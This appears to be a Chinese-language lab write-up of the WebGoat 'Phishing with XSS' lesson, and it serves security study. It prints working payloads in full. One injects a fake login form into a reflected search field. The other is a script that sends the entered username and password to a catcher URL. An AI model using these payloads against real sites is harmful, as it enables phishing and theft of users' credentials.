OWASP Cross-Site Scripting (XSS) 思路笔记

本此实践的WebGoat版本如下所示

Phishing with XSS

Lesson Plan Title: Phishing with XSS（网络钓鱼与 XSS）

这个看题目就知道要我们做什么了，主要就算通过XSS来让受害者输入自己的邮箱和密码来达到钓鱼的结果

It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. With the help of XSS you can do a Phishing Attack and add content to a page which looks official. It is very hard for a victim to determinate that the content is malicious.

它始终是一个好的习惯，来验证在服务器端的所有输入。XSS 可以发生在 HTTP 响应中使用未经验证的用户输入时。XSS 的帮助你可以做一个网络钓鱼攻击和将内容添加到一个网页，其中看起来很正式。它是很难确定内容是恶意的牺牲品。

目标呢就是用户应该能够添加一个表单要求输入用户名和密码。
然后在提交输入应发送到

http://localhost/WebGoat/catcher？PROPERTY=yes&user=catchedUserName&password=catchedPasswordName

XSS 很可能进一步将元素添加到现有的网页。此解决方案包括两个部分必须结合使用。

我们可以通过这个一个search按钮发现，这个saerch按钮会将你提交的任何数据原封不动的返回来给你，所有这就已经具备了XSS的前提。

我这翻译了部分的官方解答

form><form name="phish"><br><br><HR><H3>This feature requires account login:H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br>form><br><br><HR> 

在搜索框搜索这串数据会发现出现了两个框

我们先搜索这个字符串

然后用burpsuite截了

这里已经出现了两个窗口，当时这里并没用任何的提交按钮

我们搜索的字符串已经被浏览器本身解析成了网页的一部分

现在我们搜索这个字符串

<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} script>

注意这个localhost要改成OWASP的ip